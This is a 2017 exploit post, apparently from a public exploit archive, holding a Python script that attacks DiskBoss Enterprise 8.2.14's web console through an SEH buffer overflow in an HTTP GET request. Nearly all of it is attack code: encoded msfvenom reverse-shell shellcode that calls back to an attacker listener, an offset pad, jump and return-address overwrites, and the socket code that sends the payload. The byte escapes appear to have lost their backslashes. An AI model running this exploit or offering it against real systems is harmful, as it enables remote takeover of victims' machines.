DiskBoss Enterprise 8.2.14 Buffer Overflow
Posted on 01 August 2017
#!/usr/bin/env python # Exploit Title: DiskBoss Enterprise v8.2.14 Remote buffer overflow # Date: 2017-07-30 # Exploit Author: Ahmad Mahfouz # Author Homepage: www.unixawy.com # Vendor Homepage: http://www.diskboss.com/ # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.2.14.exe # Version: v8.2.14 # Tested on: Windows 7 SP1 x64 # Category; Windows Remote Exploit # Description: DiskBoss Enterprise with management web-console enabled can lead to full system takeover. import socket,sys print "-----------------------------------------" print "- DiskBoss Enterprise v8.2.14 TakeOver -" print "- Tested on windows 7 x64 -" print "- by @eln1x -" print "-----------------------------------------" try: target = sys.argv[1] except: print "Usage ./DB_E_v8.2.14.py 192.168.1.2" sys.exit(1) port = 80 #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.72.136 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python shellcode = "x89xe0xddxc0xd9x70xf4x58x50x59x49x49x49" shellcode += "x49x49x49x49x49x49x49x43x43x43x43x43x43" shellcode += "x37x51x5ax6ax41x58x50x30x41x30x41x6bx41" shellcode += "x41x51x32x41x42x32x42x42x30x42x42x41x42" shellcode += "x58x50x38x41x42x75x4ax49x49x6cx6dx38x4c" shellcode += "x42x35x50x77x70x67x70x65x30x4bx39x6ax45" shellcode += "x36x51x59x50x61x74x6ex6bx70x50x56x50x4e" shellcode += "x6bx30x52x64x4cx6cx4bx71x42x72x34x6ex6b" shellcode += "x73x42x36x48x34x4fx58x37x70x4ax54x66x36" shellcode += "x51x6bx4fx4cx6cx57x4cx43x51x61x6cx44x42" shellcode += "x76x4cx45x70x69x51x78x4fx46x6dx65x51x59" shellcode += "x57x6dx32x4cx32x33x62x43x67x6cx4bx36x32" shellcode += "x74x50x4ex6bx61x5ax55x6cx4cx4bx30x4cx46" shellcode += "x71x43x48x68x63x67x38x55x51x6ax71x66x31" shellcode += "x4cx4bx42x79x37x50x55x51x6bx63x4ex6bx67" shellcode += "x39x66x78x6ax43x67x4ax37x39x6cx4bx37x44" shellcode += "x4cx4bx77x71x6ex36x36x51x49x6fx4cx6cx7a" shellcode += "x61x38x4fx36x6dx66x61x6ax67x55x68x59x70" shellcode += "x42x55x4ax56x76x63x43x4dx5ax58x37x4bx63" shellcode += "x4dx56x44x51x65x7ax44x43x68x6ex6bx31x48" shellcode += "x37x54x56x61x58x53x51x76x6ex6bx46x6cx62" shellcode += "x6bx6ex6bx61x48x65x4cx46x61x5ax73x4ex6b" shellcode += "x44x44x6cx4bx63x31x5ax70x4fx79x61x54x37" shellcode += "x54x34x64x31x4bx43x6bx33x51x66x39x61x4a" shellcode += "x70x51x79x6fx69x70x71x4fx31x4fx30x5ax6c" shellcode += "x4bx45x42x48x6bx4cx4dx31x4dx61x78x34x73" shellcode += "x57x42x75x50x43x30x73x58x72x57x61x63x67" shellcode += "x42x61x4fx73x64x61x78x50x4cx64x37x51x36" shellcode += "x34x47x69x6fx58x55x6dx68x5ax30x36x61x75" shellcode += "x50x53x30x64x69x4bx74x61x44x66x30x35x38" shellcode += "x66x49x4dx50x32x4bx65x50x39x6fx49x45x62" shellcode += "x70x50x50x56x30x42x70x67x30x70x50x67x30" shellcode += "x52x70x70x68x78x6ax36x6fx69x4fx49x70x69" shellcode += "x6fx4bx65x6fx67x62x4ax35x55x51x78x6bx70" shellcode += "x6ex48x67x38x6bx38x51x78x73x32x63x30x76" shellcode += "x61x4fx4bx4fx79x6ax46x33x5ax56x70x63x66" shellcode += "x71x47x71x78x5ax39x4cx65x31x64x35x31x39" shellcode += "x6fx78x55x6bx35x4bx70x52x54x64x4cx59x6f" shellcode += "x42x6ex73x38x44x35x5ax4cx70x68x5ax50x6f" shellcode += "x45x4ex42x73x66x59x6fx4ax75x30x68x35x33" shellcode += "x50x6dx32x44x75x50x4fx79x69x73x73x67x70" shellcode += "x57x32x77x55x61x49x66x51x7ax64x52x61x49" shellcode += "x70x56x7ax42x49x6dx70x66x4bx77x33x74x66" shellcode += "x44x67x4cx77x71x53x31x6ex6dx37x34x65x74" shellcode += "x34x50x39x56x73x30x33x74x62x74x52x70x61" shellcode += "x46x33x66x76x36x30x46x36x36x62x6ex32x76" shellcode += "x50x56x66x33x43x66x71x78x71x69x5ax6cx77" shellcode += "x4fx4cx46x4bx4fx5ax75x6ex69x59x70x62x6e" shellcode += "x30x56x67x36x6bx4fx30x30x31x78x55x58x6c" shellcode += "x47x45x4dx71x70x59x6fx6bx65x4dx6bx38x70" shellcode += "x38x35x6ex42x76x36x50x68x69x36x6fx65x6d" shellcode += "x6dx6dx4dx6bx4fx6bx65x47x4cx36x66x63x4c" shellcode += "x75x5ax4fx70x6bx4bx4bx50x50x75x57x75x6f" shellcode += "x4bx43x77x62x33x70x72x32x4fx50x6ax75x50" shellcode += "x42x73x6bx4fx39x45x41x41" payload = shellcode payload += 'A' * (2492 - len(payload)) payload += 'xEBx10x90x90' # NSEH: First Short JMP payload += 'xCAxA8x02x10' # SEH : POP EDI POP ESI RET 04 libpal.dll payload += 'x90' * 10 payload += 'xE9x25xBFxFFxFF' # Second JMP to ShellCode payload += 'D' * (5000-len(payload)) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,port)) print "[*] Connection Success." except: print "Connction Refused %s:%s" %(target,port) sys.exit(2) packet = "GET /../%s HTTP/1.1 " %payload packet += "Host: 4.2.2.2 " packet += "Connection: keep-alive " packet += "Paragma: no-cache " packet += "Cahce-Control: no-cache " packet += "User-Agent: H4X0R " packet += "Referer: http://google.com " packet += " " print "[*] Get nt authority or die hard" s.send(packet) s.close()
